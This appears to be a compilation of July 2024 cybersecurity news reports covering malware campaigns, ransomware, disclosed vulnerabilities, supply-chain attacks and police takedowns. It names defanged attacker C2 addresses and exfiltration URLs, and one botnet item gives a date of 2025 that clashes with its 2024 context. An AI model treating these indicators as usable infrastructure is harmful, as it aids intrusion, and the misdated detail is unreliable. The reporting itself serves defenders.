The exact method used to infiltrate targets is currently unknown, but the initial access is exploited to drop a C-based portable executable binary that's used as a backdoor, initiate C2 communications, or inject shellcode into other legitimate processes based on the process in which it is executed – namely mspaint.exe, msiexec.exe, or contains the string "browser."
"The malware's ability to dynamically adapt its behavior based on the process it is running in, coupled with its use of complex inter-process communication through Windows pipes, further highlights its sophistication," Kaspersky noted.
The backdoor component is designed to collect information about the victim machine and retrieve instructions to enumerate files and folders, execute shell commands, perform file operations, and run additional payloads.
The C2 module, for its part, connects to a GitHub page that acts as a dead drop resolver to fetch an encoded hex string pointing to the actual server hosted on Microsoft Graph or Yandex Cloud.
"Alternatively, instead of connecting to GitHub, CloudSorcerer also tries to get the same data from hxxps://my.mail[.]ru/, which is a Russian cloud-based photo hosting server," Kaspersky said. "The name of the photo album contains the same hex string."
"The CloudSorcerer malware represents a sophisticated toolset targeting Russian government entities. Its use of cloud services such as Microsoft Graph, Yandex Cloud, and Dropbox for C2 infrastructure, along with GitHub for initial C2 communications, demonstrates a well-planned approach to cyber espionage."
Dark Web Malware Logs Expose 3,300
Users Linked to Child Abuse Sites
8.7.24
Virus
The Hacker News
An analysis of information-stealing malware logs published on the dark web has
led to the discovery of thousands of consumers of child sexual abuse material
(CSAM), indicating how such information could be used to combat serious crimes.
"Approximately 3,300 unique users were found with accounts on known CSAM sources," Recorded Future said in a proof-of-concept (PoC) report published last week. "A notable 4.2% had credentials for multiple sources, suggesting a higher likelihood of criminal behavior."
Over the past few years, off-the-shelf info-stealer variants have become a pervasive and ubiquitous threat targeting various operating systems with an aim to siphon sensitive information such as credentials, cryptocurrency wallets, payment card data, and screenshots.
This is evidenced in the rise of new stealer malware strains such as Kematian Stealer, Neptune Stealer, 0bj3ctivity, Poseidon (formerly RodStealer), Satanstealer, and StrelaStealer.
Distributed via phishing, spam campaigns, cracked software, fake update websites, SEO poisoning, and malvertising, data harvested using such programs typically find their way onto the dark web in the form of stealer logs from where they are purchased by other cybercriminals to further their schemes.
"Employees regularly save corporate credentials on personal devices or access
personal resources on organizational devices, increasing the risk of infection,"
Flare noted in a report last July.
"A complex ecosystem exists in which malware-as-a-service (MaaS) vendors sell info-stealer malware on illicit Telegram channels, threat actors distribute it through fake cracked software or phishing emails, and they then sell infected device logs on specialized dark web marketplaces."
Recorded Future's Insikt Group said it was able to identify 3,324 unique credentials used to access known CSAM domains between February 2021 and February 2024, using them to unmask three individuals who have been found to maintain accounts at no less than four websites.
The fact that stealer logs also comprise cryptocurrency wallet addresses means it could be used to determine if the addresses have been used to procure CSAM and other harmful material.
Furthermore, countries like Brazil, India, and the U.S. had the highest counts of users with credentials to known CSAM communities, although the company said that it could be due to an "overrepresentation due to dataset sourcing."
"Info-stealer malware and stolen credentials are projected to remain a cornerstone of the cybercriminal economy due to the high demand by threat actors seeking initial access to targets," it said, adding it has shared its findings with law enforcement.
"Info-stealer logs can be used by investigators and law enforcement partners to track child exploitation on the dark web and provide insight into a part of the dark web that is especially difficult to trace."
New Ransomware-as-a-Service
'Eldorado' Targets Windows and Linux Systems
8.7.24
Ransom
The Hacker News
An emerging ransomware-as-a-service (RaaS) operation called Eldorado comes with
locker variants to encrypt files on Windows and Linux systems.
Eldorado first appeared on March 16, 2024, when an advertisement for the affiliate program was posted on the ransomware forum RAMP, Singapore-headquartered Group-IB said.
The cybersecurity firm, which infiltrated the ransomware group, noted that its representative is a Russian speaker and that the malware does not overlap with previously leaked strains such as LockBit or Babuk.
"The Eldorado ransomware uses Golang for cross-platform capabilities, employing Chacha20 for file encryption and Rivest Shamir Adleman-Optimal Asymmetric Encryption Padding (RSA-OAEP) for key encryption," researchers Nikolay Kichatov and Sharmine Low said. "It can encrypt files on shared networks using Server Message Block (SMB) protocol."
The encryptor for Eldorado comes in four formats, namely esxi, esxi_64, win, and win_64, with its data leak site already listing 16 victims of June 2024. Thirteen of the targets are located in the U.S., two in Italy, and one in Croatia.
These companies span various industry verticals such as real estate, education, professional services, healthcare, and manufacturing, among others.
Further analysis of the Windows version of artifacts has revealed the use of a PowerShell command to overwrite the locker with random bytes before deleting the file in an attempt to clean up the traces.
Eldorado is the latest in the list of new double-extortion ransomware players that have sprung up in recent times, including Arcus Media, AzzaSec, dan0n, Limpopo (aka SOCOTRA, FORMOSA, SEXi), LukaLocker, Shinra, and Space Bears once again highlighting the enduring and persistent nature of the threat.
LukaLocker, linked to an operator dubbed Volcano Demon by Halcyon, is notable
for the fact that it does not make use of a data leak site and instead calls the
victim over the phone to extort and negotiate payment after encrypting Windows
workstations and servers.
The development coincides with the discovery of new Linux variants of Mallox (aka Fargo, TargetCompany, Mawahelper) ransomware as well as decryptors associated with seven different builds.
Mallox is known to be propagated by brute-forcing Microsoft SQL servers and
phishing emails to target Windows systems, with recent intrusions also making
use of a .NET-based loader named PureCrypter.
"The attackers are using custom python scripts for the purpose of payload delivery and victim's information exfiltration," Uptycs researchers Tejaswini Sandapolla and Shilpesh Trivedi said. "The malware encrypts user data and appends .locked extension to the encrypted files."
A decryptor has also been made available for DoNex and its predecessors (Muse, fake LockBit 3.0, and DarkRace) by Avast by taking advantage of a flaw in the cryptographic scheme. The Czech cybersecurity company said it has been "silently providing the decryptor" to victims since March 2024 in partnership with law enforcement organizations.
"Despite law enforcement efforts and increased security measures, ransomware groups continue to adapt and thrive," Group-IB said.
Data shared by Malwarebytes and NCC Group based on victims listed on the leak sites show that 470 ransomware attacks were recorded in May 2024, up from 356 in April. A majority of the attacks were claimed by LockBit, Play, Medusa, Akira, 8Base, Qilin, and RansomHub.
"The ongoing development of new ransomware strains and the emergence of sophisticated affiliate programs demonstrate that the threat is far from being contained," Group-IB noted. "Organizations must remain vigilant and proactive in their cybersecurity efforts to mitigate the risks posed by these ever-evolving threats."
Critical Unpatched Flaws Disclosed
in Popular Gogs Open-Source Git Service
8.7.24
Vulnerebility
The Hacker News
Four unpatched security flaws, including three critical ones, have been
disclosed in the Gogs open-source, self-hosted Git service that could enable an
authenticated attacker to breach susceptible instances, steal or wipe source
code, and even plant backdoors.
The vulnerabilities, according to SonarSource researchers Thomas Chauchefoin and Paul Gerste, are listed below -
CVE-2024-39930 (CVSS score: 9.9) - Argument injection in
the built-in SSH server
CVE-2024-39931 (CVSS score: 9.9) - Deletion of internal files
CVE-2024-39932 (CVSS score: 9.9) - Argument injection during changes preview
CVE-2024-39933 (CVSS score: 7.7) - Argument injection when tagging new releases
Successful exploitation of the first three shortcomings could permit an attacker
to execute arbitrary commands on the Gogs server, while the fourth flaw allows
attackers to read arbitrary files such as source code, and configuration
secrets.
In other words, by abusing the issues, a threat actor could read source code on the instance, modify any code, delete all code, target internal hosts reachable from the Gogs server, and impersonate other users and gain more privileges.
That said, all four vulnerabilities require that the attacker be authenticated. Furthermore, triggering CVE-2024-39930 necessitates that the built-in SSH server is enabled, the version of the env binary used, and the threat actor is in possession of a valid SSH private key.
"If the Gogs instance has registration enabled, the attacker can simply create an account and register their SSH key," the researchers said. "Otherwise, they would have to compromise another account or steal a user's SSH private key."
Gogs instances running on Windows are not exploitable, as is the Docker image. However, those running on Debian and Ubuntu are vulnerable due to the fact that the env binary supports the "--split-string" option.
According to data available on Shodan, around 7,300 Gogs instances are publicly
accessible over the internet, with nearly 60% of them located in China, followed
by the U.S., Germany, Russia, and Hong Kong.
It's currently not clear how many of these exposed servers are vulnerable to the aforementioned flaws. SonarSource said it does not have any visibility into whether these issues are being exploited in the wild.
The Swiss cybersecurity firm also pointed out that the project maintainers "did not implement fixes and stopped communicating" after accepting its initial report on April 28, 2023.
In
the absence of an update, users are recommended to disable the built-in SSH
server, turn off user registration to prevent mass exploitation, and consider
switching to Gitea. SonarSource has also released a patch that users can apply,
but noted it hasn't been extensively tested.
The disclosure comes as cloud security firm Aqua discovered that sensitive
information such as access tokens and passwords once hard-coded could remain
permanently exposed even after removal from Git-based source code management
(SCM) systems.
Dubbed phantom secrets, the issue stems from the fact that they cannot be discovered by any of the conventional scanning methods – most of which look for secrets using the "git clone" command – and that certain secrets are accessible only via "git clone --mirror" or cached views of SCM platforms, highlighting the blind spots that such scanning tools may miss.
"Commits remain accessible through 'cache views' on the SCM," security researchers Yakir Kadkoda and Ilay Goldman said. "Essentially, the SCM saves the commit content forever."
"This means that even if a secret containing commit is removed from both the cloned and mirrored versions of your repository, it can still be accessed if someone knows the commit hash. They can retrieve the commit content through the SCM platform's GUI and access the leaked secret."
Apple Removes VPN Apps from Russian App Store Amid Government Pressure
8.7.24
OS
The Hacker News
Apple removed a number of virtual private network (VPN) apps in Russia from its
App Store on July 4, 2024, following a request by Russia's state communications
watchdog Roskomnadzor, Russian news media reported.
This includes the mobile apps of 25 VPN service providers, including ProtonVPN, Red Shield VPN, NordVPN and Le VPN, according to MediaZona. It's worth noting that NordVPN previously shut down all its Russian servers in March 2019.
"Apple's actions, motivated by a desire to retain revenue from the Russian
market, actively support an authoritarian regime," Red Shield VPN said in a
statement. "This is not just reckless but a crime against civil society."
In a similar notice, Le VPN said the takedown was carried out in accordance with
No. 7 of Article 15.1 of the Federal Law dated July 27, 2006, No. 149-FZ "On
Information, Information Technologies and Information Protection" and that its
app was removed even before it received the official notice from the watchdog.
To that end, the VPN services have been included in the "Unified register" of internet resources prohibited for public distribution in Russia.
"This event marks a significant step in Roskomnadzor's ongoing efforts to control internet access and content within Russian territory," it said.
To counter the widespread crackdown, Le VPN has since launched an alternative service called Le VPN Give that it says "allows you to connect to our secret servers using third-party open-source software and obfuscated VPN connections."
The development is part of a series of censorship moves Kremlin has announced since the start of the Russo-Ukrainian war in February 2022 that has resulted in the blockade of several media outlets as well as social media apps such as Facebook, Instagram, and X.
Experts Warn of Mekotio Banking
Trojan Targeting Latin American Countries
8.7.24
Virus
The Hacker News
Financial institutions in Latin America are being threatened by a banking trojan
called Mekotio (aka Melcoz).
That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.
Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal with an aim to steal banking credentials.
First documented by ESET in August 2020, it's part of a
tetrade of banking trojans targeting the region Guildma, Javali, and
Grandoreiro, the latter of which was dismantled by law enforcement earlier this
year.
"Mekotio shares common characteristics for this type of malware, such as being
written in Delphi, using fake pop-up windows, containing backdoor functionality
and targeting Spanish- and Portuguese-speaking countries," the Slovakian
cybersecurity firm said at the time.
The malware operation suffered a blow in July 2021 when Spanish law enforcement agencies arrested 16 individuals belonging to a criminal network in connection with orchestrating social engineering campaigns targeting European users that delivered Grandoreiro and Mekotio.
Attack chains involve the use of tax-themed phishing emails that aim to trick recipients into opening malicious attachments or clicking on bogus links that lead to the deployment of an MSI installer file, which, in turn, makes use of an AutoHotKey (AHK) script to launch the malware.
It's worth noting that the infection process marks a slight deviation from the one previously detailed by Check Point in November 2021, which made use of an obfuscated batch script that runs a PowerShell script to download a second-stage ZIP file containing the AHK script.
Once installed, Mekotio harvests system information and establishes contact with a command-and-control (C2) server to receive further instructions.
It's
main objective is to siphon banking credentials by displaying fake pop-ups that
impersonate legitimate banking sites. It can also capture screenshots, log
keystrokes, steal clipboard data, and establish persistence on the host using
scheduled tasks.
The stolen information can then be used by the threat actors to gain
unauthorized access to users' bank accounts and perform fraudulent transactions.
"The Mekotio banking trojan is a persistent and evolving threat to financial systems, especially in Latin American countries," Trend Micro said. "It uses phishing emails to infiltrate systems, with the goal of stealing sensitive information while also maintaining a strong foothold on compromised machines."
The development comes as Mexican cybersecurity firm Scitum disclosed details of a new Latin American banking trojan codenamed Red Mongoose Daemon that, similar to Mekotio, utilizes MSI droppers distributed via phishing emails masquerading as invoices and tax notes.
"The main objective of Red Mongoose Daemon is to steal victims' banking information by spoofing PIX transactions through overlapping windows," the company said. "This trojan is aimed at Brazilian end users and employees of organizations with banking information."
"Red Mongoose Daemon has capabilities for manipulating and creating windows, executing commands, controlling the computer remotely, manipulating web browsers, hijacking clipboards, and impersonating Bitcoin wallets by replacing copied wallets with the ones used by cybercriminals."
GootLoader Malware Still Active,
Deploys New Versions for Enhanced Attacks
5.7.24
Virus
The Hacker News
The malware known as GootLoader continues to be in active use by threat actors
looking to deliver additional payloads to compromised hosts.
"Updates to the GootLoader payload have resulted in several versions of GootLoader, with GootLoader 3 currently in active use," cybersecurity firm Cybereason said in an analysis published last week.
"While some of the particulars of GootLoader payloads have changed over time,
infection strategies and overall functionality remain similar to the malware's
resurgence in 2020."
GootLoader, a malware loader part of the Gootkit banking trojan, is linked to a
threat actor named Hive0127 (aka UNC2565). It abuses JavaScript to download
post-exploitation tools and is distributed via search engine optimization (SEO)
poisoning tactics.
It typically serves as a conduit for delivering various payloads such as Cobalt Strike, Gootkit, IcedID, Kronos, REvil, and SystemBC.
In recent months, the threat actors behind GootLoader have also unleashed their
own command-and-control (C2) and lateral movement tool dubbed GootBot,
indicating that the "group is expanding their market to gain a wider audience
for their financial gains."
Attack chains involve compromising websites to host the GootLoader JavaScript
payload by passing it off as legal documents and agreements, which, when
launched, sets up persistence using a scheduled task and executes additional
JavaScript to kick-start a PowerShell script for collecting system information
and awaiting further instructions.
"Sites that host these archive files leverage Search Engine Optimization (SEO)
poisoning techniques to lure in victims that are searching for business-related
files such as contract templates or legal documents," security researchers Ralph
Villanueva, Kotaro Ogino, and Gal Romano said.
The attacks are also notable for making use of source code encoding, control flow obfuscation, and payload size inflation in order to resist analysis and detection. Another technique entails embedding the malware in legitimate JavaScript library files like jQuery, Lodash, Maplace.js, and tui-chart.
"GootLoader has received several updates during its life cycle, including changes to evasion and execution functionalities," the researchers concluded.
Polyfill[.]io Attack Impacts Over
380,000 Hosts, Including Major Companies
5.7.24
Hacking
The Hacker News
The supply chain attack targeting widely-used Polyfill[.]io JavaScript library
is wider in scope than previously thought, with new findings from Censys showing
that over 380,000 hosts are embedding a polyfill script linking to the malicious
domain as of July 2, 2024.
This includes references to "https://cdn.polyfill[.]io" or "https://cdn.polyfill[.]com" in their HTTP responses, the attack surface management firm said.
"Approximately 237,700, are located within the Hetzner network (AS24940), primarily in Germany," it noted. "This is not surprising – Hetzner is a popular web hosting service, and many website developers leverage it."
Further analysis of the affected hosts has revealed domains tied to prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson that reference the malicious endpoint in question. Details of the attack emerged in late June 2024 when Sansec alerted that code hosted on the Polyfill domain had been modified to redirect users to adult- and gambling-themed websites. The code changes were made such that the redirections only took place at certain times of the day and only against visitors who met certain criteria.
The nefarious behavior is said to have been introduced after the domain and its associated GitHub repository were sold to a Chinese company named Funnull in February 2024.
The development has since prompted domain registrar Namecheap to suspend the domain, content delivery networks such as Cloudflare to automatically replace Polyfill links with domains leading to alternative safe mirror sites, and Google to block ads for sites embedding the domain.
While the operators attempted to relaunch the service under a different domain
named polyfill[.]com, it was also taken down by Namecheap as of June 28, 2024.
Of the two other domains registered by them since the start of July –
polyfill[.]site and polyfillcache[.]com – the latter remains up and running.
On
top of that, a more extensive network of potentially related domains, including
bootcdn[.]net, bootcss[.]com, staticfile[.]net, staticfile[.]org,
unionadjs[.]com, xhsbpza[.]com, union.macoms[.]la, newcrbpc[.]com, has been
uncovered as tied to the maintainers of Polyfill, indicating that the incident
might be part of a broader malicious campaign.
"One of these domains, bootcss[.]com, has been observed engaging in malicious
activities that are very similar to the polyfill[.]io attack, with evidence
dating back to June 2023," Censys noted, adding it discovered 1.6 million
public-facing hosts that link to these suspicious domains.
"It wouldn't be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future."
The development comes as WordPress security company Patchstack warned of cascading risks posed by the Polyfill supply chain attack on sites running the content management system (CMS) through dozens of legitimate plugins that link to the rogue domain.
New Golang-Based Zergeca Botnet
Capable of Powerful DDoS Attacks
5.7.24
BotNet
The Hacker News
Cybersecurity researchers have uncovered a new botnet called Zergeca that's
capable of conducting distributed denial-of-service (DDoS) attacks.
Written in Golang, the botnet is so named for its reference to a string named "ootheca" present in the command-and-control (C2) servers ("ootheca[.]pw" and "ootheca[.]top").
"Functionally, Zergeca is not just a typical DDoS botnet; besides supporting six different attack methods, it also has capabilities for proxying, scanning, self-upgrading, persistence, file transfer, reverse shell, and collecting sensitive device information," the QiAnXin XLab team said in a report. Zergeca is also notable for using DNS-over-HTTPS (DoH) to perform Domain Name System (DNS) resolution of the C2 server and using a lesser-known library known as Smux for C2 communications.
There is evidence to suggest that the malware is actively developing and updating the malware to support new commands. What's more, the C2 IP address 84.54.51[.]82 is said to have been previously used to distribute the Mirai botnet around September 2023.
As of April 29, 2025, the same IP address began to be used as a C2 server for the new botnet, raising the possibility that the threat actors "accumulated experience operating the Mirai botnets before creating Zergeca."
Attacks mounted by the botnet, primarily ACK flood DDoS attacks, have targeted Canada, Germany, and the U.S. between early and mid-June 2024.
Zergeca's features span four distinct modules – namely
persistence, proxy, silivaccine, and zombie – to set up persistence by adding a
system service, implementing proxying, removing competing miner and backdoor
malware, and gaining exclusive control over devices running the x86-64 CPU
architecture, and handle the main botnet functionality.
The zombie module is responsible for reporting sensitive information from the
compromised device to the C2 and awaits commands from the server, supporting six
types of DDoS attacks, scanning, reverse shell, and other functions.
"The built-in competitor list shows familiarity with common Linux threats," XLab said. "Techniques like modified UPX packing, XOR encryption for sensitive strings, and using DoH to hide C2 resolution demonstrate a strong understanding of evasion tactics."
Microsoft Uncovers Critical Flaws in Rockwell Automation PanelView Plus
5.7.24
ICS
The Hacker News
Microsoft has revealed two security flaws in Rockwell Automation PanelView Plus
that could be weaponized by remote, unauthenticated attackers to execute
arbitrary code and trigger a denial-of-service (DoS) condition.
"The [remote code execution] vulnerability in PanelView Plus involves two custom classes that can be abused to upload and load a malicious DLL into the device," security researcher Yuval Gordon said.
"The DoS vulnerability takes advantage of the same custom class to send a crafted buffer that the device is unable to handle properly, thus leading to a DoS."
The list of shortcomings is as follows -
CVE-2023-2071 (CVSS score: 9.8) - An improper input
validation vulnerability that allows unauthenticated attackers to achieve remote
code executed via crafted malicious packets.
CVE-2023-29464 (CVSS score: 8.2) - An improper input validation vulnerability
that allows an unauthenticated threat actor to read data from memory via crafted
malicious packets and result in a DoS by sending a packet larger than the buffer
size
Successful exploitation of the twin flaws permits an adversary to execute code
remotely or lead to information disclosure or a DoS condition.
While CVE-2023-2071 impacts FactoryTalk View Machine Edition (versions 13.0,
12.0, and prior), CVE-2023-29464 affects FactoryTalk Linx (versions 6.30, 6.20,
and prior).
It's worth noting that advisories for the flaws were released by Rockwell Automation on September 12, 2023, and October 12, 2023, respectively. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released its own alerts on September 21 and October 17.
The disclosure comes as unknown threat actors are believed to be exploiting a recently disclosed critical security flaw in HTTP File Server (CVE-2024-23692, CVSS score: 9.8) to deliver cryptocurrency miners and trojans such as Xeno RAT, Gh0st RAT, PlugX, and GoThief, the last of which uses Amazon Web Services (AWS) to steal information from the infected host.
The vulnerability, described as a case of template injection, allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
Brazil Halts Meta's AI Data
Processing Amid Privacy Concerns
4.7.24
AI
The Hacker News
Brazil's data protection authority, Autoridade Nacional de Proteção de Dados
(ANPD), has temporarily banned Meta from processing users' personal data to
train the company's artificial intelligence (AI) algorithms.
The ANPD said it found "evidence of processing of personal data based on inadequate legal hypothesis, lack of transparency, limitation of the rights of data subjects, and risks to children and adolescents."
The decision follows the social media giant's update to its terms that allow it to use public content from Facebook, Messenger, and Instagram for AI training purposes.
A recent report published by Human Rights Watch found that LAION-5B, one of the largest image-text datasets used to train AI models, contained links to identifiable photos of Brazilian children, putting them at risk of malicious deepfakes that could place them under even more exploitation and harm.
Brazil has about 102 million active users, making it one of the largest markets. The ANPD noted the Meta update violates the General Personal Data Protection Law (LGBD) and has "the imminent risk of serious and irreparable or difficult-to-repair damage to the fundamental rights of the affected data subjects."
Meta has five working days to comply with the order, or risk facing daily fines of 50,000 reais (approximately $8,808).
In a statement shared with the Associated Press, the company said the policy "complies with privacy laws and regulations in Brazil," and that the ruling is "a step backwards for innovation, competition in AI development and further delays bringing the benefits of AI to people in Brazil."
Cybersecurity
The social media firm has received similar pushback in the European Union
(E.U.), forcing it to pause plans to train its AI models using data from users
in the region without getting explicit consent from users.
Last week, Meta's president of global affairs, Nick Clegg, said that the E.U. was losing "fertile ground for innovation" by coming down too hard on tech companies.
Global Police Operation Shuts Down
600 Cybercrime Servers Linked to Cobalt Strike
4.7.24
Crime
The Hacker News
A coordinated law enforcement operation codenamed MORPHEUS has felled close to
600 servers that were used by cybercriminal groups and were part of an attack
infrastructure associated with the Cobalt Strike.
The crackdown targeted older, unlicensed versions of the Cobalt Strike red teaming framework between June 24 and 28, according to Europol.
Of the 690 IP addresses that were flagged to online service providers in 27 countries as associated with criminal activity, 590 are no longer accessible.
The joint operation, which commenced in 2021, was led by the U.K. National Crime Agency (NCA) and involved authorities from Australia, Canada, Germany, the Netherlands, Poland and the U.S. Officials from Bulgaria, Estonia, Finland, Lithuania, Japan, and South Korea provided additional support.
Cobalt Strike is a popular adversary simulation and penetration testing tool developed by Fortra (formerly Help Systems), offering IT security experts a way to identify weaknesses in security operations and incident responses.
However, as previously observed by Google and Microsoft, cracked versions of the software have found their way into the hands of malicious actors, who have time-and-again abused it for post-exploitation purposes.
According to a recent report from Palo Alto Networks Unit 42, this involves the use of a payload called Beacon, which uses text-based profiles called Malleable C2 to alter the characteristics of Beacon's web traffic in an attempt to avoid detection.
"Although Cobalt Strike is a legitimate piece of software, sadly cybercriminals have exploited its use for nefarious purposes," Paul Foster, director of threat leadership at the NCA, said in a statement.
"Illegal versions of it have helped lower the barrier of entry into cybercrime, making it easier for online criminals to unleash damaging ransomware and malware attacks with little or no technical expertise. Such attacks can cost companies millions in terms of losses and recovery."
The development comes as Spanish and Portuguese law enforcement have arrested 54 people for committing crimes against elderly citizens through vishing schemes by posing as bank employees and tricking them into parting with personal information under the guise of rectifying a problem with their accounts.
The details were then passed on to other members of the criminal network, who would visit the victims' homes unannounced and pressure them into giving away their credit cards, PIN codes, and bank details. Some instances also involved the theft of cash and jewelry.
The criminal scheme ultimately enabled the miscreants to take control of the targets' bank accounts or make unauthorized cash withdrawals from ATMs and other expensive purchases.
"Using a blend of fraudulent phone calls and social engineering, the criminals are responsible for €2,500,000 in losses," Europol said earlier this week.
"The funds were deposited into multiple Spanish and Portuguese accounts controlled by the fraudsters, from where they were funneled into an elaborate money laundering scheme. An extensive network of money mules overseen by specialist members of the organization was used to disguise the origin of the illicit funds."
Cybersecurity
The arrests also follow similar action undertaken by INTERPOL to dismantle human
trafficking rings in several countries, including Laos, where several Vietnamese
nationals were lured with promises of high-paying jobs, only to be coerced into
creating fraudulent online accounts for financial scams.
"Victims worked 12-hour workdays, extended to 14 hours if they failed to recruit others, and had their documents confiscated," the agency said. "Families were extorted up to USD $10,000 to secure their return to Vietnam."
Last week, INTERPOL said it also seized $257 million worth of assets and froze 6,745 bank accounts following a global police operation spanning 61 countries that was conducted to disrupt online scam and organized crime networks.
The exercise, referred to as Operation First Light, targeted phishing, investment fraud, fake online shopping sites, romance, and impersonation scams. It led to the arrest of 3,950 suspects and identified 14,643 other possible suspects in all continents
Twilio's Authy App Breach Exposes
Millions of Phone Numbers
4.7.24
Incindent
The Hacker News
Cloud communications provider Twilio has revealed that unidentified threat
actors took advantage of an unauthenticated endpoint in Authy to identify data
associated with Authy accounts, including users' cell phone numbers.
The company said it took steps to secure the endpoint to no longer accept unauthenticated requests.
The development comes days after an online persona named ShinyHunters published on BreachForums a database comprising 33 million phone numbers allegedly pulled from Authy accounts.
Authy, owned by Twilio since 2015, is a popular two-factor authentication (2FA) app that adds an additional layer of account security.
"We have seen no evidence that the threat actors obtained access to Twilio's systems or other sensitive data," it said in a July 1, 2024, security alert.
But out of an abundance of caution, it's recommending that users upgrade their Android (version 25.1.0 or later) and iOS (version 26.1.0 or later) apps to the latest version.
It also cautioned that the threat actors may attempt to use the phone number associated with Authy accounts for phishing and smishing attacks.
"We encourage all Authy users to stay diligent and have heightened awareness around the texts they are receiving," it noted.
Microsoft MSHTML Flaw Exploited to Deliver MerkSpy Spyware Tool
4.7.24
Virus
The Hacker News
Unknown threat actors have been observed exploiting a now-patched security flaw
in Microsoft MSHTML to deliver a surveillance tool called MerkSpy as part of a
campaign primarily targeting users in Canada, India, Poland, and the U.S.
"MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems," Fortinet FortiGuard Labs researcher Cara Lin said in a report published last week.
The starting point of the attack chain is a Microsoft Word document that ostensibly contains a job description for a software engineer role.
But opening the file triggers the exploitation of CVE-2021-40444, a high-severity flaw in MSHTML that could result in remote code execution without requiring any user interaction. It was addressed by Microsoft as part of Patch Tuesday updates released in September 2021.
In this case, it paves the way for the download of an HTML file ("olerender.html") from a remote server that, in turn, initiates the execution of an embedded shellcode after checking the operating system version.
"Olerender.html" takes advantage of "'VirtualProtect' to modify memory permissions, allowing the decoded shellcode to be written into memory securely," Lin explained.
"Following this, 'CreateThread' executes the injected shellcode, setting the stage for downloading and executing the next payload from the attacker's server. This process ensures that the malicious code runs seamlessly, facilitating further exploitation."
The shellcode serves as a downloader for a file that's deceptively titled "GoogleUpdate" but, in reality, harbors an injector payload responsible for evading detection by security software and loading MerkSpy into memory.
The spyware establishes persistence on the host through Windows Registry changes such that it's launched automatically upon system startup. It also comes with capabilities to clandestinely capture sensitive information, monitor user activities, and exfiltrate data to external servers under the threat actors' control.
This includes screenshots, keystrokes, login credentials stored in Google Chrome, and data from the MetaMask browser extension. All this information is transmitted to the URL "45.89.53[.]46/google/update[.]php."
The development comes as Symantec detailed a smishing campaign targeting users in the U.S. with sketchy SMS messages that purport to be from Apple and aim to trick them into clicking on bogus credential harvesting pages ("signin.authen-connexion[.]info/icloud") in order to continue using the services.
"The malicious website is accessible from both desktop and mobile browsers," the Broadcom-owned company said. "To add a layer of perceived legitimacy, they have implemented a CAPTCHA that users must complete. After this, users are directed to a webpage that mimics an outdated iCloud login template."
FakeBat Loader Malware Spreads
Widely Through Drive-by Download Attacks
3.7.24
Virus
The Hacker News
The loader-as-a-service (LaaS) known as FakeBat has become one of the most
widespread loader malware families distributed using the drive-by download
technique this year, findings from Sekoia reveal.
"FakeBat primarily aims to download and execute the next-stage payload, such as IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif," the company said in a Tuesday analysis.
Drive-by attacks entail the use of methods like search engine optimization (SEO) poisoning, malvertising, and nefarious code injections into compromised sites to entice users into downloading bogus software installers or browser updates.
The use of malware loaders over the past few years
dovetails with the growing use of landing pages impersonating legitimate
software websites by passing them off as legitimate installers. This ties into
the larger aspect that phishing and social engineering remain one of the threat
actors' main ways to acquire initial access.
FakeBat, also known as EugenLoader and PaykLoader, has been offered to other
cybercriminals under a LaaS subscription model on underground forums by a
Russian-speaking threat actor named Eugenfest (aka Payk_34) since at least
December 2022.
The loader is designed to bypass security mechanisms and provides customers with options to generate builds using templates to trojanize legitimate software as well as monitor installations over time through an administration panel.
While the earlier versions made use of an MSI format for the malware builds, recent iterations observed since September 2023 have switched to an MSIX format and added a digital signature to the installer with a valid certificate to sidestep Microsoft SmartScreen protections.
The malware is available for $1,000 per week and $2,500
per month for the MSI format, $1,500 per week and $4,000 per month for the MSIX
format, and $1,800 per week and $5,000 per month for the combined MSI and
signature package.
Sekoia said it detected different activity clusters disseminating FakeBat by three primary approaches: Impersonating popular software through malicious Google ads, fake web browser updates via compromised sites, and social engineering schemes on social networks. This encompasses campaigns likely related to the FIN7 group, Nitrogen, and BATLOADER.
"In addition to hosting payloads, FakeBat [command-and-control] servers highly likely filter traffic based on characteristics such as the User-Agent value, the IP address, and the location," Sekoia said. "This enables the distribution of the malware to specific targets."
The disclosure comes as the AhnLab Security Intelligence Center (ASEC) detailed a malware campaign distributing another loader named DBatLoader (aka ModiLoader and NatsoLoader) through invoice-themed phishing emails.
It also follows the discovery of infection chains propagating Hijack Loader (aka DOILoader and IDAT Loader) via pirated movie download sites to ultimately deliver the Lumma information stealer.
"This IDATLOADER campaign is using a complex infection chain containing multiple
layers of direct code-based obfuscation alongside innovative tricks to further
hide the maliciousness of the code," Kroll researcher Dave Truman said.
"The infection hinged around utilizing Microsoft's mshta.exe to execute code
buried deep within a specially crafted file masquerading as a PGP Secret Key.
The campaign made use of novel adaptations of common techniques and heavy
obfuscation to hide the malicious code from detection."
Phishing campaigns have further been observed delivering Remcos RAT, with a new Eastern European threat actor dubbed Unfurling Hemlock leveraging loaders and emails to drop binary files that act as a "cluster bomb" to spread different malware strains at once.
"The malware being distributed using this technique is mostly comprised of stealers, such as RedLine, RisePro, and Mystic Stealer, and loaders such as Amadey and SmokeLoader," Outpost24 researcher Hector Garcia said.
"Most of the first stages were detected being sent via email to different companies or being dropped from external sites that were contacted by external loaders."
Israeli Entities Targeted by
Cyberattack Using Donut and Sliver Frameworks
3.7.24
Hacking
The Hacker News
Cybersecurity researchers have discovered an attack campaign that targets
various Israeli entities with publicly-available frameworks like Donut and
Sliver.
The campaign, believed to be highly targeted in nature, "leverage target-specific infrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities across unrelated verticals, and rely on well-known open-source malware," HarfangLab said in a report last week.
The French company is tracking the activity under the name Supposed Grasshopper. It's a reference to an attacker-controlled server ("auth.economy-gov-il[.]com/SUPPOSED_GRASSHOPPER.bin"), to which a first-stage downloader connects to.
This downloader, written in Nim, is rudimentary and is
tasked with downloading the second-stage malware from the staging server. It's
delivered by means of a virtual hard disk (VHD) file that's suspected to be
propagated via custom WordPress sites as part of a drive-by download scheme.
The second-stage payload retrieved from the server is Donut, a shellcode
generation framework, which serves as a conduit for deploying an open-source
